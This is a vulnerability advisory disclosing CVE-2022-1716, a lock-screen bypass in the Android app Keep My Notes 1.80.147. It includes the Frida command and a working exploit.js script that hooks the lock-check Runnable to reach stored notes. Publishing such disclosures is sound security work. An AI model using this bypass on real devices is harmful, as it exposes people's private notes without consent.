Keep My Notes 1.80.147 - Improper Access Control

Summary

Name: Keep My Notes 1.80.147 - Improper Access Control
Code name: Tyler
Product: Keep My Notes
Affected versions: Version 1.80.147
State: Public
Release date: 2022-06-01

Vulnerability

Kind: Improper Access Control
Rule: 115. Security controls bypass or absence
Remote: No
CVSSv3 Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVSSv3 Base Score: 6.1
Exploit available: Yes
CVE ID(s): CVE-2022-1716

Description

An attacker with physical access to the victim's device can bypass the application's password/PIN lock and access the user's notes. This is possible because the application lacks adequate security controls against dynamic code manipulation: the lock-screen check runs in the app process and can be rewritten at runtime with an instrumentation framework such as Frida.

Proof of Concept

Note that for successful exploitation the "Continue" button must be clicked repeatedly.

https://user-images.githubusercontent.com/51862990/168275718-5f8e230f-54f1-4c7c-8393-c58f0dcfda2b.mp4

Steps to reproduce

  1. Install and configure frida as indicated in the following link.

  2. Run the following command to hook the run method of the lock-screen class so that it is dynamically replaced, bypassing the application's protection.

    frida -U 'Keep My Notes' -l exploit.js
    
  3. Now all you have to do is click the "Continue" button 3 or 4 times, then close the application and finally open it again.

System Information

  • Package Name: org.whiteglow.keepmynotes
  • Application Label: Keep My Notes
  • Mobile app version: 1.80.147
  • OS: Android 8.0 (API 26)

Exploit

// exploit.js
Java.perform(() => {
    console.log("[+] Hooking LockScreenActivity - Class f - Method run");
    const LockScreenActivity = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity");
    // Inner class LockScreenActivity$f implements the Runnable that performs the lock check.
    const f = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity$f");
    // Replace the check with a direct call to the method that dismisses the lock screen.
    f.run.implementation = () => {
        console.log("Bypass Lock Screen");
        LockScreenActivity.$new().d();
    };
});

Mitigation

There is currently no patch available for this vulnerability. The root cause is that the lock is enforced only by a client-side check in the app process, so rewriting that check at runtime is enough to reach the stored notes.

Credits

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

References

Vendor page: http://www.kitetech.co/keepmynotes

Timeline

2022-05-12: Vulnerability discovered.

2022-05-12: Vendor contacted.

2022-05-12: Vendor confirmed the vulnerability.

2022-06-01: Public disclosure.